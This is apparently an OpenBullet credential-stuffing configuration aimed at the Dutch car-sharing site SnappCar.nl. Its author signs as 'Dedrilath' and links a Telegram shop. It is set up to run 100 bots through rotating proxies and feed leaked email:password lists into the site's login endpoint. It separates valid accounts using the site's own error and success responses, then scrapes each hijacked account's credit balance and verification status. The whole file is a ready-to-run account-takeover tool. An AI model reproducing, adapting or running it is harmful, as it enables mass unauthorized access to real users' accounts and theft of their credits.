[SETTINGS]
{
  "Name": "SnappCar.nl",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-05-07T10:27:55.0412657+02:00",
  "AdditionalInfo": "https://t.me/DedrilathShop",
  "Author": "Dedrilath",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": true,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.snappcar.nl/auth/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "origin: https://www.snappcar.nl" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.snappcar.nl/Login.aspx" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "404" 
    KEY "Het ingevulde e-mailadres of wachtwoord is onjuist." 
  KEYCHAIN Success OR 
    KEY "{\"userId\":\"" 

REQUEST GET "https://www.snappcar.nl/Accounts/Default.aspx" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "SnappCar Credits:" "</span>" CreateEmpty=FALSE -> CAP "Credits:" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "geverifieerd! " 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "geverifieerd! " 

